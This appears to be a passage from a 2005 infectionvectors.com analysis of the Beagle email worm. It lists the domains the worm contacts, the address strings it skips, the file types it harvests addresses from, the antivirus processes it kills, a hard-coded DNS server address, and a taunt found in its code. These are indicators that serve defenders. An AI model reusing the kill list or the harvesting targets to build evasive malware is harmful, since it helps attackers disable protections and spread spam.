www.transportation.gov.bh www.gci-bln.de www.travelchronic.de www.gcnet.ru www.traverse.com www.generationnow.net www.uhcc.com www.gfn.org www.ulpiano.org www.giantrevenue.com www.uslungiarue.it www.glass.la www.vandermost.de www.handsforhealth.com www.vbw.info www.hartacorporation.com www.velezcourtesymanagement.com www.himpsi.org www.velocityprint.com www.idb-group.net www.vikingpc.pl www.immonaut.sk www.vinirforge.com www.ims-i.com www.wecompete.com www.innnewport.com www.worest.com.ar www.irakli.org www.woundedshepherds.com www.irinaswelt.de www.wwwebad.com www.jansenboiler.com www.wwwebmaster.com www.jasnet.pl
Beagle’s “Do Not Call” List
The Beagle variants continue to avoid sending email to addresses with the following strings:
@avp. feste noreply @foo free-av ntivi @hotmail f-secur panda @iana gold-certs@ pgp @messagelab google postmaster@ @microsoft help@ rating@ @msn icrosoft root@ abuse info@ samples admin kasp sopho anyone@ linux spam bsd listserv support bugs@ local unix cafee news update certific nobody@ winrar contract@ noone@ winzip
Files to Search for Addresses
Beagle harvests email addresses from files with the following extensions: ADB MDX SHTM ASP MHT STM CFG MMF TBB CGI MSG TXT DBX NCH UIN DHTM ODS WAB EML OFT WSH HTM PHP XLS JSP PL XML MBX SHT
Processes Terminated By Beagle (from Beagle.AU, however, most lists are very similar):
mcagent.exe CFIAUDIT.EXE NISUM.EXE alogserv.exe DefWatch.exe nopdb.exe APVXDWIN.EXE DRWEBUPW.EXE NPROTECT.EXE ATUPDATER.EXE ESCANH95.EXE NPROTECT.EXE ATUPDATER.EXE ESCANHNT.EXE NUPGRADE.EXE AUPDATE.EXE FIREWALL.EXE NUPGRADE.EXE AUTODOWN.EXE FrameworkService.exe OUTPOST.EXE AUTOTRACE.EXE ICSSUPPNT.EXE PavFires.exe AUTOUPDATE.EXE ICSUPP95.EXE pavProxy.exe Avconsol.exe LUALL.EXE pavsrv50.exe AVENGINE.EXE LUCOMS~1.EXE Rtvscan.exe AVPUPD.EXE mcshield.exe RuLaunch.exe Avsynmgr.exe MCUPDATE.EXE SAVScan.exe AVWUPD32.EXE mcvsescn.exe SHSTAT.EXE AVXQUAR.EXE mcvsrte.exe SNDSrvc.exe AVXQUAR.EXE mcvsshld.exe symlcsvc.exe blackd.exe navapsvc.exe UPDATE.EXE ccApp.exe navapsvc.exe Vshwin32.exe ccEvtMgr.exe navapsvc.exe VsStat.exe ccProxy.exe navapw32.exe VsTskMgr.exe ccPxySvc.exe
DNS Server Hard-Coded into Beagle.AZ
217.5.97.137
inetnum: 217.0.0.0 - 217.5.127.255 netname: DTAG-DIAL13 descr: Deutsche Telekom AG country: DE admin-c: DTIP tech-c: DTST status: ASSIGNED PA
The Year of the Beagle
The original Beagle worm retrieved Mitglieder:
Beagle.J’s code contains the following line of text:
"Hey, NetSky, fuck off you bitch, don't ruine our bussiness, wanna start a war ?"
Beagle.M’s hidden picture and message:
The White Rabbit Presents
|
Copyright Ó 2005 infectionvectors.com. All rights reserved.
